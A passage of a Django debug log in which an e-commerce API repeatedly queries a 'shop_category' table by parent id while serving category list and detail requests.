"shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:43:28,028 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:43:28,032 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:43:28,036 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:43:28,042 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:43:28,046 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:43:28,050 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:43:28,054 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:43:28,058 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:43:28,062 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:43:28,065 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:43:28,068 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:43:28,070 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:43:28,073 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:43:28,078 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:43:28,082 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:43:28,086 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:43:28,090 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:43:28,093 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:43:28,095 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:43:28,099 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:43:28,101 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:43:28,103 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:43:28,107 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:43:28,109 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:43:28] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:43:28,193 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:43:28,198 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 13:43:28] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:43:28,410 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:43:28,417 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:43:28,422 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:43:28,425 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:43:28,428 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:43:28,430 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:43:28,432 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:43:28,435 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:43:28,437 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:43:28,440 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:43:28,442 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:43:28,444 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:43:28,447 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:43:28,449 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:43:28,452 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:43:28,454 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:43:28,456 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:43:28,459 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:43:28,461 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:43:28,465 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:43:28,467 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:43:28,469 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:43:28,473 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:43:28,475 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:43:28,477 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:43:28,481 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:43:28,483 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:43:28,486 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:43:28,488 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:43:28,491 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:43:28,496 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:43:28,499 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:43:28,501 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:43:28,503 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:43:28,506 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:43:28,510 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:43:28,512 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:43:28,515 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:43:28,517 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:43:28,520 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:43:28,522 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:43:28,525 utils 4252 140031721535232 (0.001) 